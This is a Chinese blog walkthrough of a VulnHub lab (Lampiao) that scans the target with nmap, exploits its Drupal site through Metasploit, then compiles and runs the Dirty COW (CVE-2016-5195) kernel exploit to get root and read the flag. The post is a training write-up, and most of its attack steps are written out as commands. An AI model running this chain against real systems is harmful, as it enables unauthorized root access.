Linux提权脏牛内核漏洞演示

通过这篇文章你将学会利用Linux的脏牛内核漏洞配合MSF提权

靶机下载地址:https://www.vulnhub.com/entry/lampiao-1,249/
攻击机:Kali 2022

靶机无密码 无图形化界面

攻击机Kali

攻击过程

Nmap 网段扫描

nmap扫描网段寻找存活IP
namp 192.168.75.0/24

扫描端口寻找存活端口 注意这里 "-p1-65535" 是扫描从1到65535的所有端口
nmap -p1-65535 192.168.75.144

Web渗透

Web站点

已知是知名CMS 利用kali进行攻击

首先发现192.168.76.141,开放的80端口,可以访问。在端口扫描中发现开放的1898端口并可以访问。1898端口的网页中有“Powered by Drupal”字样,> 搜索“drupal”确定是CMS。搜索drupal CMS的漏洞,可以在搜索引擎搜,或在msf搜索

show options​
set rhost 192.168.75.144
​set rport 1898​
exploit

攻击成功

内网渗透

使用脚本进行信息收集——漏洞探针
脚本地址:https://github.com/mzet-/linux-exploit-suggester
上传漏洞探针脚本
upload /root/linux-exploit-suggester.sh /tmp/1.sh

进入shell命令 进去/tmp/文件夹使用1.sh

发现脏牛漏洞 下载或上传exp

下载地址:https://github.com/gbonacini/CVE-2016-5195

进入shell

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil

python -c 'import pty; pty.spawn("/bin/bash")'

该exp需要一个交互式的终端,不然无法正常执行。这里开一个虚拟的交互终端

运行
./dcow
运行成功,dcow回显了一个root密码,用它登录
su root
在root文件夹下有flag
cat /root/flag.txt

posted @ 2023-01-13 19:37  周知行  阅读(214)  评论(0编辑  收藏  举报